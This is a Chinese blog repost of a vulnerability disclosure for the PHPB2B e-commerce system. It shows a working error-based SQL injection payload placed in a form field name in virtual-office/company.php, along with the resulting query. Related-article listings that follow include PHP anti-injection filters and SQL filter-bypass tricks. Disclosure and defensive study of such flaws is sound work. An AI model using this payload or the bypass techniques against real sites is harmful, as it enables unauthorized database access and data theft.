php 过滤绕过注入,PHPB2B注入#1(绕过过滤)

最新推荐文章于 2023-05-16 13:50:24 发布
最新推荐文章于 2023-05-16 13:50:24 发布
阅读量151 收藏
点赞数
文章标签: php 过滤绕过注入

### 简要描述:

PHPB2B某处注入#1。绕过过滤。

官方最新版本. https://github.com/ulinke/phpb2b/archive/master.zip

漏洞文件。virtual-office/company.php

### 详细说明:

POST /phpb2b/virtual-office/company.php

Content-Disposition: form-data; name="data[company][name]"

Content-Disposition: form-data; name="data[company][english_name']"

Content-Disposition: form-data; name="data[company][employee_amount]"

Content-Disposition: form-data; name="data[company][year_annual]"

Content-Disposition: form-data; name="data[company][manage_type]"

Content-Disposition: form-data; name="data[company][property]"

Content-Disposition: form-data; name="data[company][description]"

Content-Disposition: form-data; name="data[company][main_prod]"

Content-Disposition: form-data; name="data[company][address]"

Content-Disposition: form-data; name="data[company][zipcode]"

Content-Disposition: form-data; name="data[company][boss_name]"

Content-Disposition: form-data; name="data[company][reg_address]"

...

...

多个参数存在同样的问题。

data[*][*1] 未经处理。

ex:

Content-Disposition: form-data; name="data[company][employee_amount FROM pb_thk_companyfields where 1=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)#]"

执行:

SELECT name,english_name,employee_amount FROM pb_thk_companyfields where 1=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)#,year_annual,manage_type,property,description,main_prod,address,zipcode,boss_name,reg_address,found_date,reg_fund,bank_from,bank_account,main_brand,main_biz_place,main_customer,link_man,position,mobile,site_url,email,employee_amount,tel,fax,picture,status,industry_id,area_id,modified,cache_membergroupid FROM pb_thk_companies WHERE id='12' AND member_id=3

### 漏洞证明:

本地测试开启了debug模式。

可延时注入。

[p1.jpg](https://images.seebug.org/upload/201410/250210508e345addfc7894829be7cef60b694c87.jpg)

数据库日志。

[p2.png](https://images.seebug.org/upload/201410/250209300b779501c2b73cac5df3771a448554d4.png)

loading-bars.svg

涂山鹿
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
比较好用的PHP注入漏洞过滤函数代码
10-28
PHP整站防注入程序,需要在公共文件中require_once本文件,因为现在网站被注入攻击现象很严重,所以推荐大家使用
PHPB2B电子商务网站管理系统源代码
03-18
友邻PHPB2B是一款基于PHP程序和Mysql数据库、以MVC架构为基础的开源B2B行业门户电子商务网站建站系统,系统代码完整、开源,功能全面,架构优秀,提供良好的用户体验、多国语言化及管理平台,是目前搭建B2B行业门户...
php过滤注入变量
flynetcn的专栏
11-02 2214
php//如果环境是php5并且屏蔽了长格式的预定义变量,就进行模仿长格式预定义变量。if (@phpversion() >= 5.0.0 && (!@ini_get(register_long_arrays) || @ini_get(register_long_arrays) == 0 || strtolower(@ini_get(register_long_arrays
PHP 过滤注入语句
weixin_42136237的博客
05-16 135
PHP 过滤注入语句
php 字符串防注入,php 字符过滤和防sql注入
weixin_42510317的博客
03-09 268
Filter,它的作用就和他的名字一样——过滤过滤规则成为过滤器,Filter内置了多个常用过滤器,根据过滤器功能的不同,可以分成净化过滤器(Sanitization)和验证过滤器(Validation)两种。两种的差别在于,净化过滤器会把被过滤的变量中不符合规则的东西清除掉,返回清除后的内容;而验证过滤器只是验证的功能,并不会去改变变量的值,如果符合过滤器的规则,则返回变量内容,否则返回fal...
phpb2b:PHPB2B是一个开源和免费的b2b程序
05-24
PHPB2B PHPB2B是Ualink社区提供的免费开源B2B程序,一直致力于为企业提供出色的开源电子商务解决方案。 自从第一版于2007年发布以来,已有12年的历史。 它是为数不多的持续提供更新的开源B2B系统之一。 我们的目标是...
基于PHP的齐博phpB2B电子商务系统源码.zip
最新发布
10-21
齐博phpB2B电子商务系统是一款基于PHP编程语言开发的商业对商业(Business-to-Business,简称B2B)在线交易平台。它为商家提供了一个全面的功能框架,用于构建和管理在线销售、采购、库存和订单处理等业务流程。在这...
PHPB2B电子商务网站管理系统 v6.0
10-22
友邻PHPB2B是一款基于PHP程序和Mysql数据库、以MVC架构为基础的开源B2B行业门户电子商务网站建站系统,系统代码完整、开源,功能全面,架构优秀,提供良好的用户体验、多国语言化及管理平台,是目前搭建B2B行业门户...
php 过滤变量,php过滤注入变量的实例代码
weixin_39883065的博客
03-10 84
/*** 过滤注入变量的代码* edit:www.jbxue.com*///php5且屏蔽了长格式的预定义变量,则模仿长格式预定义变量。if (@phpversion() >= '5.0.0' && (!@ini_get('register_long_arrays') || @ini_get('register_long_arrays') == '0' || strtolow...
php注入和XSS攻击通用过滤
weixin_45472548的博客
07-08 330
public function SafeFilter($arr){ if (empty($arr)) { return false; } $ra=Array('/([\x00-\x08,\x0b-\x0c,\x0e-\x19])/','/script/','/javascript/','/vbscript/','/expression/','/applet/','/meta/','/xml/','/blink/','/link/','/
注入过滤php,php过滤客户提交参数,防注入
weixin_33220360的博客
03-09 155
Warning: strncmp() has been disabled for security reasons in /www/web/default/blog/public_html/wp-includes/formatting.php on line 117Warning: strncmp() has been disabled for security reasons in /www...
post防注入过滤 php,PHP之POST参数过滤,防止SQL注入
weixin_30139213的博客
03-12 862
php整站防sql注入程序,对于MySQL用户,可以使用函数mysql_real_escape_string( ),此函数需要注意编码问题,另外还有一个函数mysql_escape_string( )也可以使用,尽量使用为你的数据库设计的转义函数。如果没有,使用函数addslashes()是最终的比较好的方法。当所有用于建立一个SQL语句的数据被正确过滤和转义时,实际上也就避免了SQL注入的风险。...
sql绕过php,SQL注入绕过技巧
weixin_39758618的博客
04-02 1815
1、 大小写混合2、替换关键字3、使用编码4、使用注释5、等价函数与命令6、使用特殊符号7、HTTP参数控制8、缓冲区溢出9、整合绕过a) 大小写绕过大小写绕过用于只针对小写或大写的关键字匹配技术正则表达式/express/i 匹配时大小写不敏感便无法绕过,这是最简单的绕过技术z.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4b)替换关键字这种情况下大...
注入过滤php,php 防sql注入过滤代码
weixin_30679547的博客
03-09 511
function phps教程ql_show($str){$str = stripslashes($str);$str = str_replace("\", "", $str);$str = str_replace("/", "/", $str);$str = str_replace(" ", " ", $str);$str = str_replace(",", ",", $str);return...
php通用过滤,php注入和XSS攻击通用过滤
weixin_30384285的博客
03-10 222
public function SafeFilter($arr){$ra=Array('/([\x00-\x08,\x0b-\x0c,\x0e-\x19])/','/script/','/javascript/','/vbscript/','/expression/','/applet/','/meta/','/xml/','/blink/','/link/','/style/','/embed/...
php命令注入绕过姿势,sql注入读取文件之各种绕过姿势
weixin_42137032的博客
03-10 379
目录回显判断注入点确定过滤类型各种绕过姿势注入0x00环境介绍目标地址:http://172.16.12.100:81注入要求:通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件中。 0x01渗透思路进入答题后,显示为使用select * from article where id= ('1')提交表单后得到的信息,已经知道id输入的参数值为字符,不需要进行判断;已经少了判断字符型...
php 字符串防注入过滤,php过滤html字符串,防止SQL注入
weixin_39901439的博客
03-17 343
php过滤html字符串,防止SQL注入php过滤html字符串,防止SQL注入,用函数把将要写入到数据库的字符串处理下,过滤非法信息,以及恶意的html代码!//php 批量过滤post,get敏感数据if (get_magic_quotes_gpc()) {$_GET = stripslashes_array($_GET);$_POST = stripslashes_array($_POST)...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值